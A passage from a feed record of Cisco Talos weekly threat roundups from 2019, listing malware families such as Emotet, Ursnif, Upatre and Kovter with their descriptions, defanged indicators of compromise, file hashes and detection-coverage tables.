which appeared in late 2016. Due to the similarities between Trickbot and Dyre, it is suspected some of the individuals responsible for Dyre are now responsible for Trickbot. Trickbot has been rapidly evolving over the months since it has appeared. However, Trickbot is still missing some of the capabilities Dyre possessed. Its current modules include DLL injection, system information gathering, and email searching. \nGamarue malware detected \\- (190) \nGamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system. \nSpecial Search Offer adware \\- (110) \nSpecial Search Offer adware displays unwanted advertising in the form of popups or by injecting into browsers and altering advertisements on webpages. Adware has also been known to download and install malware. \nInstallcore adware detected \\- (95) \nInstall core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware. \nDealply adware detected \\- (84) \nDealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware. \n \n", "cvss3": {}, "published": "2019-09-27T07:22:13", "type": "talosblog", "title": "Threat Roundup for September 20 to September 27", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-0708"], "modified": "2019-09-27T07:22:13", "id": "TALOSBLOG:5D2BCB335060A8EBF6F71CB579112042", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/SPetxCMHc3E/threat-roundup-0920-0927.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-25T17:34:07", "description": "[](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)\n\nToday, Talos is publishing a glimpse into the most prevalent threats we've observed between Oct. 18 and Oct. 25. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats. \n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net. \n \nFor each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/ciscoblogs/5db322f0ac4bd.txt>)that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness. \nThe most prevalent threats highlighted in this roundup are: \n \nThreat Name | Type | Description \n---|---|--- \nWin.Dropper.Emotet-7355854-0 | Dropper | Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails. \nWin.Malware.Ursnif-7355802-1 | Malware | Ursnif is used to steal sensitive information from an infected host and can also act as a malware downloader. It is commonly spread through malicious emails or exploit kits. \nWin.Malware.Upatre-7355650-0 | Malware | Upatre is a trojan that is often delivered through spam emails with malicious attachments or links. It is known to be a downloader and installer for other malware. \nWin.Dropper.Kovter-7352197-0 | Dropper | Kovter is known for its fileless persistence mechanism. This family of malware creates several malicious registry entries which store it's malicious code. Kovter is capable of reinfecting a system even if the file system has been cleaned of the infection. It has been used in the past to spread ransomware and click-fraud malware. \nWin.Malware.Trickbot-7352185-1 | Malware | Trickbot is a banking trojan targeting sensitive information for select financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB Scripts. \nWin.Virus.Expiro-7350682-0 | Virus | Expiro is a known file infector and information stealer that hinders analysis with anti-debugging and anti-analysis tricks. \nWin.Malware.Tofsee-7349716-1 | Malware | Tofsee is multipurpose malware that features a number of modules used to carry out various activities, such as sending spam messages, conducting click fraud, mining cryptocurrency and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator\u2019s control. \nWin.Malware.Nymaim-7348211-1 | Malware | Nymaim is malware that can be used to deliver ransomware and other malicious payloads. It uses a domain generation algorithm to generate potential command and control (C2) domains to connect to additional payloads. \nWin.Malware.Cerber-7343756-1 | Malware | Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension \".cerber,\" although in more recent campaigns, this is no longer the case. \n \n* * *\n\n## Threat Breakdown\n\n### Win.Dropper.Emotet-7355854-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SPOOLERIPSPS ` | 10 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SPOOLERIPSPS \nValue Name: Type ` | 10 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SPOOLERIPSPS \nValue Name: Start ` | 10 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SPOOLERIPSPS \nValue Name: ErrorControl ` | 10 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SPOOLERIPSPS \nValue Name: ImagePath ` | 10 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SPOOLERIPSPS \nValue Name: DisplayName ` | 10 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SPOOLERIPSPS \nValue Name: WOW64 ` | 10 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SPOOLERIPSPS \nValue Name: ObjectName ` | 10 \n`<HKLM>\\SOFTWARE\\CLASSES\\MFCCALC.CALCULATOR ` | 10 \n`<HKLM>\\SOFTWARE\\CLASSES\\MFCCALC.CALCULATOR\\CLSID ` | 10 \n`<HKLM>\\SOFTWARE\\CLASSES\\WOW6432NODE\\CLSID\\{62C4DD10-F45E-11CD-8C3D-00AA004BB3B7}\\PROGID ` | 10 \n`<HKLM>\\SOFTWARE\\CLASSES\\WOW6432NODE\\CLSID\\{62C4DD10-F45E-11CD-8C3D-00AA004BB3B7}\\INPROCHANDLER32 ` | 10 \n`<HKLM>\\SOFTWARE\\CLASSES\\MFCCALC.CALCULATOR ` | 10 \n`<HKLM>\\SOFTWARE\\CLASSES\\MFCCALC.CALCULATOR\\CLSID ` | 10 \n`<HKLM>\\SOFTWARE\\CLASSES\\WOW6432NODE\\CLSID\\{62C4DD10-F45E-11CD-8C3D-00AA004BB3B7}\\LOCALSERVER32 ` | 10 \n`<HKLM>\\SOFTWARE\\CLASSES\\WOW6432NODE\\CLSID\\{62C4DD10-F45E-11CD-8C3D-00AA004BB3B7} ` | 9 \n`<HKLM>\\SOFTWARE\\CLASSES\\WOW6432NODE\\CLSID\\{62C4DD10-F45E-11CD-8C3D-00AA004BB3B7} ` | 9 \n`<HKLM>\\SOFTWARE\\CLASSES\\WOW6432NODE\\CLSID\\{62C4DD10-F45E-11CD-8C3D-00AA004BB3B7}\\PROGID ` | 9 \n`<HKLM>\\SOFTWARE\\CLASSES\\WOW6432NODE\\CLSID\\{62C4DD10-F45E-11CD-8C3D-00AA004BB3B7}\\INPROCHANDLER32 ` | 9 \n`<HKLM>\\SOFTWARE\\CLASSES\\WOW6432NODE\\CLSID\\{62C4DD10-F45E-11CD-8C3D-00AA004BB3B7}\\LOCALSERVER32 ` | 9 \n`<HKLM>\\SOFTWARE\\CLASSES\\WOW6432NODE\\CLSID\\\\PROGID ` | 1 \n`<HKLM>\\SOFTWARE\\CLASSES\\WOW6432NODE\\CLSID\\\\INPROCHANDLER32 ` | 1 \n`<HKLM>\\SOFTWARE\\CLASSES\\WOW6432NODE\\CLSID\\\\INPROCHANDLER32 ` | 1 \n`<HKLM>\\SOFTWARE\\CLASSES\\WOW6432NODE\\CLSID ` | 1 \n`<HKLM>\\SOFTWARE\\CLASSES\\WOW6432NODE\\CLSID\\\\LOCALSERVER32 ` | 1 \nMutexes | Occurrences \n---|--- \n`Global\\I98B68E3C` | 10 \n`Global\\M98B68E3C` | 10 \n`Global\\M3C28B0E4` | 8 \n`Global\\I3C28B0E4` | 8 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`45[.]33[.]54[.]74` | 10 \n`54[.]38[.]94[.]197` | 9 \n`173[.]194[.]68[.]108/31` | 8 \n`74[.]208[.]5[.]15` | 7 \n`193[.]70[.]18[.]144` | 7 \n`172[.]217[.]10[.]83` | 7 \n`74[.]208[.]5[.]2` | 6 \n`74[.]6[.]141[.]50/31` | 6 \n`205[.]178[.]146[.]249` | 5 \n`173[.]203[.]187[.]10` | 5 \n`173[.]203[.]187[.]14` | 5 \n`205[.]204[.]101[.]152` | 5 \n`74[.]6[.]141[.]44/31` | 5 \n`17[.]36[.]205[.]74/31` | 5 \n`178[.]128[.]148[.]110` | 5 \n`209[.]141[.]41[.]136` | 5 \n`217[.]69[.]139[.]160` | 4 \n`205[.]178[.]146[.]235` | 4 \n`69[.]147[.]92[.]12` | 4 \n`65[.]55[.]72[.]183` | 4 \n`159[.]127[.]187[.]12` | 4 \n`94[.]100[.]180[.]70` | 4 \n`94[.]100[.]180[.]160` | 4 \n`23[.]227[.]38[.]64` | 4 \n`172[.]217[.]3[.]115` | 4 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`secure[.]emailsrvr[.]com` | 8 \n`smtp-mail[.]outlook[.]com` | 8 \n`smtpout[.]secureserver[.]net` | 8 \n`smtp[.]mail[.]com` | 7 \n`smtp[.]mail[.]ru` | 7 \n`smtp[.]aol[.]com` | 6 \n`smtp[.]comcast[.]net` | 6 \n`smtp[.]1and1[.]com` | 5 \n`smtp[.]prodigy[.]net[.]mx` | 5 \n`ssl0[.]ovh[.]net` | 5 \n`mail[.]paypal[.]com` | 4 \n`mail[.]mail[.]ru` | 4 \n`smtp[.]dsl[.]telkomsa[.]net` | 4 \n`mail[.]widatra[.]com` | 3 \n`smtp[.]dropbox[.]com` | 3 \n`outbound[.]att[.]net` | 3 \n`smtp[.]emailsrvr[.]com` | 3 \n`smtp[.]verizon[.]net` | 3 \n`smtp[.]idmsa[.]apple[.]com` | 3 \n`smtp[.]cox[.]net` | 3 \n`mail[.]enterprisesolutioninc[.]com` | 3 \n`smtp[.]mxhichina[.]com` | 3 \n`mail[.]americashomeplace[.]com` | 3 \n`smtp[.]fatcow[.]com` | 3 \n`relais[.]videotron[.]ca` | 3 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%SystemRoot%\\SysWOW64\\spooleripspsa.exe` | 1 \n`\\TEMP\\aatgsjewU4YpaJ.exe` | 1 \n`\\TEMP\\4uwvBUGZ.exe` | 1 \n`\\TEMP\\sqjjfdnz8obMXZL.exe` | 1 \n`\\TEMP\\D9VaRGmZ.exe` | 1 \n`%SystemRoot%\\TEMP\\D3F5.tmp` | 1 \n`\\TEMP\\PdapKX6bjx.exe` | 1 \n \n#### File Hashes\n\n` 0bf9f6907fd3f6a3f5734b23120671230c480b03c96a1779348f9cdc49bb58f8 11f97585ad2aeb41f4c972b2e29523d4ca70cc4a065547d9abca659d2c3193d1 418ba2dbbda1d95428128998352856705040857f1008fbdf809cdeb7c174211f 9d8895333339dde00e8778e9181cfbf0df29e35c0dda842aa30ff7a44b96cd11 a3a3de174e94beb142799b6f03c84bfe4c563e287a6a5288bbd64ccc9910ce24 aea84511050a07ff22e621888f19921585485fd171228cc6ad723f4c1b90225f b988217de26056f0db1ba17940d5fc0e138c59fc46652d7b5046281f8152aa0b ca3889a38bf35766b0ad59605bd6d3f6c333309f690708a3b51f7e80cc32be85 d4363da6ccb0a0ef3c69010d7351a2d9459e4c5fef26fe00c240eb901125cd78 ddb191fb3328dd25f79f79133e821cdb36590a80cabb1e6a1206fd11a19445ec `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-FRlFNOpm0Cg/XbMSvyeCfVI/AAAAAAAAC0s/E_8TKFBeqWEznPa8cjb_NdbIdhC5EcjhQCLcBGAsYHQ/s1600/418ba2dbbda1d95428128998352856705040857f1008fbdf809cdeb7c174211f_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-stSf5Ksf8ss/XbMSz5eBiCI/AAAAAAAAC0w/NFK7djTRizIWicly3fDTR1I8g2ZfUWVYgCLcBGAsYHQ/s1600/418ba2dbbda1d95428128998352856705040857f1008fbdf809cdeb7c174211f_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Ursnif-7355802-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: api-PQEC ` | 10 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\IAM \nValue Name: Server ID ` | 10 \n`<HKCU>\\SOFTWARE\\APPDATALOW\\SOFTWARE\\MICROSOFT\\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 \nValue Name: Client ` | 10 \n`<HKCU>\\SOFTWARE\\APPDATALOW\\SOFTWARE\\MICROSOFT\\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 \nValue Name: {F50EA47E-D053-EF14-82F9-0493D63D7877} ` | 10 \n`<HKCU>\\SOFTWARE\\APPDATALOW\\SOFTWARE\\MICROSOFT\\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 \nValue Name: {6A4DAFE8-C11D-2C5C-9B3E-8520FF528954} ` | 10 \nMutexes | Occurrences \n---|--- \n`Local\\{57025AD2-CABB-A1F8-8C7B-9E6580DFB269}` | 10 \n`Local\\{7FD07DA6-D223-0971-D423-264D4807BAD1}` | 10 \n`Local\\{B1443895-5CF6-0B1E-EE75-506F02798413}` | 10 \n`{A7AAF118-DA27-71D5-1CCB-AE35102FC239}` | 10 \n`{<random GUID>}` | 10 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`208[.]67[.]222[.]222` | 10 \n`172[.]217[.]10[.]110` | 10 \n`172[.]86[.]121[.]117` | 10 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`resolver1[.]opendns[.]com` | 10 \n`222[.]222[.]67[.]208[.]in-addr[.]arpa` | 10 \n`myip[.]opendns[.]com` | 10 \nFiles and or directories created | Occurrences \n---|--- \n`\\{4BC230AC-2EB3-B560-90AF-42B9C45396FD}` | 10 \n`%APPDATA%\\Microsoft\\Dmlogpui` | 10 \n`%APPDATA%\\Microsoft\\Dmlogpui\\datat3hc.exe` | 10 \n`%TEMP%\\<random, matching [A-F0-9]{3,4}>` | 10 \n`%TEMP%\\<random, matching [A-F0-9]{3,4}\\[A-F0-9]{2,4}>.bat` | 10 \n`%TEMP%\\<random, matching [A-F0-9]{4}>.bi1` | 9 \n`\\TEMP\\4F03FE~1.EXE` | 1 \n`%TEMP%\\CE0E\\6707.tmp` | 1 \n`\\TEMP\\69E08A~1.EXE` | 1 \n`%TEMP%\\47D0\\A3E8.tmp` | 1 \n`\\TEMP\\85FD74~1.EXE` | 1 \n`%TEMP%\\903.bi1` | 1 \n`\\TEMP\\906352~1.EXE` | 1 \n`\\TEMP\\A11B56~1.EXE` | 1 \n`%TEMP%\\3634\\1B1A.tmp` | 1 \n`%TEMP%\\3E3E\\1F1F.tmp` | 1 \n`\\TEMP\\BB271B~1.EXE` | 1 \n`\\TEMP\\C1C116~1.EXE` | 1 \n`%TEMP%\\8878\\443C.tmp` | 1 \n`\\TEMP\\CA13C5~1.EXE` | 1 \n`%TEMP%\\C9AC\\64D6.tmp` | 1 \n`\\TEMP\\D66D2E~1.EXE` | 1 \n`\\TEMP\\E4F5F1~1.EXE` | 1 \n \n#### File Hashes\n\n` 4f03fe32e46386a2379e65b631e786cdeeec223017069d2731a723e4d2c50393 69e08aa34638b3b213dc3c7f7a188e4d56685ca8abd4bfa97f575757a1f4bc12 85fd74ee1f19173597c3995376c31c617c0cd615d1d4e862edbe2459200397ed 90635217dd43e1ccfc8c25aef6619b1a929b5e7d1800b9cebd8686d052243611 a11b566c7bd562cb4cdee2c1bc92313a11ebdacf4fdde58c224eb7eac0e6faf1 bb271b6725170345188008dfb90069c9f741b93cf0a504a9c70f177c2dd670cb c1c1165edb4b0853d6433961aec1b54982fe3273a094d53bb1b2f23e9f6713de ca13c5fb577c3a218a3be31c59145137e11b4c7188839b7962a3ce3e7d6277ec d66d2ea9744ca077c3dc76c303a284c1d2b863151931ddcce656fb35a52289e6 e4f5f19e945a41ad8f0ec7e9c35b23ea039a5a2bdaaf8e42a78c8f86b231334e `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-WE_0-l9xsRY/XbMTGgbn3yI/AAAAAAAAC08/PF7db_lZj3IaYc5hrsljMrxhSQY2JA5JACLcBGAsYHQ/s1600/bb271b6725170345188008dfb90069c9f741b93cf0a504a9c70f177c2dd670cb_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-MDzTnqb5kkw/XbMTJwxP1JI/AAAAAAAAC1A/hpqhzB9wiRkO5YlIR5EknRTVx2VEto5EQCLcBGAsYHQ/s1600/bb271b6725170345188008dfb90069c9f741b93cf0a504a9c70f177c2dd670cb_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Upatre-7355650-0\n\n#### Indicators of Compromise\n\nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`83[.]136[.]254[.]57` | 8 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`cardiffpower[.]com` | 8 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\hcbnaf.exe` | 18 \n`%TEMP%\\hgnddkje.exe` | 17 \n \n#### File Hashes\n\n` 0001e614c453604df0274956181e30350b7d6b1b91a169efdcbfee9a14a17626 01cd20d9212c000b7d8d97c47029b1b487050ead1b65e1c9c34e475f0f178add 055c1293bfc73671ac423aca35488dc3ec7510523695b8bf50d2f52e625680b7 1abc3b0481dc17e7aa7176b87605503b0baa9e340b4c5e673597fd06725f72f8 1f1db1372645d08bf117d2154ef9f67a2163295900b6311e4cd2268669601c1c 27e9f49d26c1202470242da4fe53199b74f525ee13bee5b34b1d613f2d5f2983 4200aca5bfb24f7b02cbcd39c7d6f4c773ed34eec17ac11ad9d5cee5aaba1940 669b62caaa55cf04de326355b319e16f481092c8098b418f9f2b09051b5e9088 8412bf5346bedec07e58c31bd15ddd98d31e8686c9f870444b2bbd1c8b527cb7 9476469b243db70017ef61c6da483e516516380136a4799015a4ef056e9f1742 9fe8e8a4818e3d63741c4c21ebb9e240d1a26573614162c0b313246b387ef13d a9d192a121401a7bb63b4fb403f346153090f239ff0761d2f12d12b7bc49741f bcecb26d7f81aa151a5d2f74f91029a6b1160bc02f431b3c617971ecdeb9e79b e0b5ae5ad859b17ee532cb274f952ee18254fe941b3d8a129fddda85c65225fb f480866abfdfd00f7c4a383f1acc9cdd01915d67fed1db367e8dd1cb41171983 f4968453af8a196794abe13cca1747da16b15850c99428778c9a1f6609ca22db fbd5dcf3f1a93947cb72d9b9d48189810c630d32e94b6f2bbb1811a349e1fb00 fc51c46b56c0a23b400789cd2408a8e8f0204ebb544a410298578c277227cea9 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-5MK_onxmsMg/XbMTvl3A0sI/AAAAAAAAC1Q/gRy_kxL2IkIu_yBoasybIt95BdGrmjmJgCLcBGAsYHQ/s1600/055c1293bfc73671ac423aca35488dc3ec7510523695b8bf50d2f52e625680b7_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-NNRa5QrtV38/XbMT0YUs6PI/AAAAAAAAC1U/ViBmNEJ3xSU2PgWdqR3p9W5-LFExBEKIwCLcBGAsYHQ/s1600/4200aca5bfb24f7b02cbcd39c7d6f4c773ed34eec17ac11ad9d5cee5aaba1940_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-Hl00DmZo4z0/XbMT6a04q6I/AAAAAAAAC1Y/npMrmH8bx70pm-DzeEFwmFAnz1u2gFEQgCLcBGAsYHQ/s1600/2eb229efaa5a043263e6546583c811738d5695a8afbb035f3c76fe80929c18eb_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.Kovter-7352197-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\INTERNET EXPLORER\\MAIN\\FEATURECONTROL\\FEATURE_BROWSER_EMULATION \nValue Name: iexplore.exe ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\INTERNET EXPLORER\\MAIN\\FEATURECONTROL\\FEATURE_BROWSER_EMULATION \nValue Name: iexplore.exe ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\INTERNET EXPLORER\\MAIN\\FEATURECONTROL\\FEATURE_BROWSER_EMULATION \nValue Name: regsvr32.exe ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\INTERNET EXPLORER\\MAIN\\FEATURECONTROL\\FEATURE_BROWSER_EMULATION \nValue Name: regsvr32.exe ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\3E7DC3D9A3 \nValue Name: ab87b5d3 ` | 25 \n`<HKCU>\\SOFTWARE\\3E7DC3D9A3 \nValue Name: ab87b5d3 ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\3E7DC3D9A3 \nValue Name: 626beb1a ` | 25 \n`<HKCU>\\SOFTWARE\\3E7DC3D9A3 \nValue Name: 626beb1a ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\3E7DC3D9A3 \nValue Name: 52e3fdae ` | 25 \n`<HKCU>\\SOFTWARE\\3E7DC3D9A3 \nValue Name: 52e3fdae ` | 25 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN ` | 25 \n`<HKCU>\\SOFTWARE\\3E7DC3D9A3 ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\3E7DC3D9A3 ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\3E7DC3D9A3 \nValue Name: 13faecd5 ` | 25 \n`<HKCU>\\SOFTWARE\\3E7DC3D9A3 \nValue Name: 13faecd5 ` | 25 \n`<HKCU>\\SOFTWARE\\3E7DC3D9A3 \nValue Name: 214fab25 ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\3E7DC3D9A3 \nValue Name: 214fab25 ` | 25 \n`<HKCU>\\SOFTWARE\\3E7DC3D9A3 \nValue Name: 89d39e9a ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\3E7DC3D9A3 \nValue Name: 89d39e9a ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 3f88794a ` | 25 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: f50e45da ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 3f88794a ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.101 \nValue Name: CheckSetting ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.103 \nValue Name: CheckSetting ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.100 \nValue Name: CheckSetting ` | 25 \nMutexes | Occurrences \n---|--- \n`4C2A424BDFE77F08` | 25 \n`Global\\377DB1FA5041B00C` | 25 \n`2CAEEF5D79FF2C96` | 25 \n`5F02253DDD3215C1` | 25 \n`0F8579C06C8A73E7` | 15 \n`Global\\148FEA91D04ADF73` | 15 \n`35A61B8070E50AA3` | 15 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`82[.]21[.]65[.]83` | 1 \n`166[.]141[.]185[.]163` | 1 \n`93[.]229[.]231[.]137` | 1 \n`142[.]250[.]246[.]73` | 1 \n`159[.]182[.]203[.]131` | 1 \n`63[.]121[.]210[.]194` | 1 \n`42[.]97[.]167[.]153` | 1 \n`113[.]179[.]182[.]225` | 1 \n`156[.]34[.]80[.]75` | 1 \n`218[.]64[.]159[.]231` | 1 \n`182[.]94[.]255[.]58` | 1 \n`84[.]226[.]162[.]67` | 1 \n`212[.]123[.]72[.]164` | 1 \n`183[.]74[.]168[.]214` | 1 \n`20[.]118[.]2[.]20` | 1 \n`168[.]141[.]179[.]181` | 1 \n`114[.]97[.]61[.]121` | 1 \n`201[.]32[.]115[.]236` | 1 \n`108[.]124[.]8[.]164` | 1 \n`212[.]246[.]227[.]79` | 1 \n`68[.]6[.]254[.]161` | 1 \n`159[.]133[.]144[.]196` | 1 \n`16[.]215[.]96[.]194` | 1 \n`189[.]183[.]233[.]195` | 1 \n`60[.]194[.]81[.]71` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`www[.]cloudflare[.]com` | 2 \n`cpanel[.]com` | 1 \n`httpd[.]apache[.]org` | 1 \n`cp[.]aliyun[.]com` | 1 \n`netcn[.]console[.]aliyun[.]com` | 1 \n`bugs[.]launchpad[.]net` | 1 \n`manpages[.]debian[.]org` | 1 \n`files[.]ofile[.]com` | 1 \n`www[.]zerodistance[.]fi` | 1 \n \n#### File Hashes\n\n` 015d420249c90969fc15bd3c81839c05242c68e42135bc6e04743f16c3db8247 119e68e1ed3d764e9ccedbffb4e2adc1522b9a9c4672c8a52c70d3b75af919f1 19595e9e80a2da27c682814726e373d7207e6681b9a4b96a5744736976342f46 1fc7d5d27d4817cacae040833970a636a41a6cfe9fa783de92cdad2e93a620ac 21f75f1a46cc68cde8bc7cc10d63bca95a561268ad49d943afc8ca177cc89184 26555d26c4afce1e035031d293aab4acdb12a77530b375421be6e0bb80742057 41ce8bc25ec1a3bf85e346656cdfdcd1eaa4070c3783d133f25ffcebf55bb6d8 423e4d33687cb3e6fe4ebce6d36fa2d0b94006b28ad08de89fa2d2be2db4046a 533b055f7be13fe6c40eb49bebf93901b22ea3ada9babf100675c7ca53cd0c03 605ea58c8282dc5ef581f31b24647d463562d646a5be2004a174773416ec106c 6181608294d3482931e3a65f1e7c63182327076506e1c7c51583b57ef115d8ed 69ba2b3868404234ead2f364cbbfd1a13af9da0fbfa77845a09e06525f3c107f 72e70aa9877033cdf9c6d77f767545cd1365f7034a4da22c823eea4d60eb1bee 76d567e13a7cb9d97682944975accbeb0c4f3f6858ab84f64af849c4d5df25bb 8136ceed3bc05c0ebe9b0ac8bb9c9925eb781f6fa4a994c976f3ff24f692e962 91f71c8b5385d7441e2f8b82ce5be7f17a9c9fddd431c45dafab309d2fd76145 9218ea373d7322c49a3248b94b13366499f23d30b1f17ea63c3c19fe788376a6 97603c7315e26964dd15bdfb9a5932340271a949352364ebcb694282dd282ed1 9e7ce5f193afa02fc3165a34366981a34a1685deaf2b249f4fb089c8a25e77fd a318a5c36defbd74a7ad1ef3cca3670dadb918d692ce1e97c62b8022bb5a7ee6 c36a861e05aac4fa885836f60b871cc116085e05351d8a1a586db85dc902786f d0120bc8873d60781fd8a0640ce9d37a2f8daefc90747196ba70f4e7b5af41c1 d1fe8fea741f9758292df1b335ed203c4f9f6ec462690dd7338f043a01ffae8c d89115020458a087bb71f7f338e8b5cc9182c98d6559cf0573c5a87304fdd65b dfe7a1d91600e7bde92d16deb4a3bee5da7c01391d55f3e03c57e817d7bff7c6 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa | N/A \n \n#### Screenshots of Detection\n\n#### 